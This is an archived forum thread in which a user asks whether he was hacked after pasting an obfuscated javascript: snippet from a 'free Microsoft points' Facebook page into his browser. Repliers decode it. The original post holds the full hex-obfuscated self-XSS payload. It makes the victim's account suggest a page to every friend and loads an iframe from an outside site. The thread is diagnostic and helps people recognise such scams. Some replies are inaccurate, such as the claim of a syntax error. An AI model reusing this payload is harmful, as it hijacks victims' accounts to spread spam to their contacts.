...

View Full Version : Was I javascript hacked?



Keychain1234
07-30-2010, 01:35 AM
I have a problem that hopefully someone here can help me with. Since I don't know any Javascript, I thought I would check here.Through a "get free microsoft points" facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar. It appeared that nothing happened, but my friend who knows a little javascript told me that
the code is nasty stuff that tried to access my computer. I really have two major questions.

1. What if anything did me entering the code do to my computer?

2. How do I fix it?

Before I give the code, little bit about my system. I tried it with both firefox and IE. I am on windows vista 32 bit. I have trend micro anti virus and ran it, nothing suspicious was seen.




javascript:var _0x8a13=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79" ,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\ x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22 \x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73 \x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67 \x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61 \x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x32\x31\x32 \x31\x33\x35\x33\x37\x39\x32\x34\x32\x35\x38\x22\x20 \x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74 \x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69 \x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75 \x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61
\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73 ","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\ x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\ x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\
x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68 \x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\ x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x72\x65\ x61\x6D\x74\x72\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x73\x70\x2E\x68\x74\x6D\x6C\x22\
x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\ x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\ x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\ x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x8a13[0],_0x8a13[1]
,_0x8a13[2],_0x8a13[3],_0x8a13[4],_0x8a13[5],_0x8a13[6],_0x8a13[7],_0x8a13[8],_0x8a13[9] ,_0x8a13[10],_0x8a13[11],_0x8a13[12],_0x8a13[13]]; void (document[variables[2]] (variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]) ;var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000);
void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x8a13[14]);



Thanks for everyone's help.

gizmo1650
07-30-2010, 02:14 AM
you weren't hacked, js has no effect on anything outside of the page that called it.
the code was obscurified to make it harder to read, but if you put in your URL bar javascript:alert("\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C") you will see innerHTML, you can do this for the rest of the code to see what it actually said. The code didn't do anything because there is a syntax error in it.

Old Pedant
07-30-2010, 02:26 AM
I don't think it's a virus, per se.

Just a way to conceal what they are doing to get you to buy into their stuff.

FWIW, the "hidden strings" in there (the ones that are encoded as "\x69\x6E\x6E\x65\x72..." etc.) are actually these strings:


innerHTML
app4949752878_body
getElementById
<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=121213537924258" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>
suggest
MouseEvents
createEvent
click
initEvent
dispatchEvent
select_all
sgm_invite_form
/ajax/social_gsubmitDialog
<iframe src="http://www.dreamtrick.net/msp.html" style="width: 820px; height: 600px;" frameborder=0 scrolling="no"></iframe>

Hmmmm...maybe I'm wrong.

It looks like it waits 4 seconds and then does a "select_all" (that is, grabs everything on the page) and then, one second later, submits the stuff it just selected to some place.

So I *THINK* it is trying to grab all the contents of the page it is installed on and send it off somewhere so that somebody can try to get whatever data they can find there for their own purposes.

I don't see any way it got anything "off your computer" other than whatever was on the page you were then viewing. If the page you were viewing had your username and password on it, then maybe it swiped them. So go change your password.

Old Pedant
07-30-2010, 02:28 AM
The code didn't do anything because there is a syntax error in it.

??? I didn't see a syntax error. What did you see?

Keychain1234
07-30-2010, 03:01 AM
Thanks Old Pedant. What happened to the guy who actually ran that javascript is exactly what you described the javascript does. He said that it selected all the options on the page and then automatically suggested that page to all of his facebook friends.

Thank you for the quick response! I can stop worrying so much now about it.

_Aerospace_Eng_
07-30-2010, 08:10 AM
Key words "a little". Your antivirus and firewalls would be throwing up alerts. If the code wasn't put there by you then its possible someone injected it in some way on the server.

Philip M
07-30-2010, 10:16 AM
Since I don't know any Javascript, I thought I would check here.Through a "get free microsoft points" facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar.

Alas, there is one born every minute. I hope that you have learned something from this - never, ever do such a thing. You seem to be a ripe target for phishing and you were lucky that you did not introduce a virus into your machine. The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.

Rowsdower!
07-30-2010, 03:27 PM
...The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.

Call me immature, but that made me chuckle. :thumbsup:

wildreason
07-30-2010, 03:47 PM
Call me immature, but that made me chuckle. :thumbsup:

Pretty immature if you ask me. What are you, 4?

:p



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum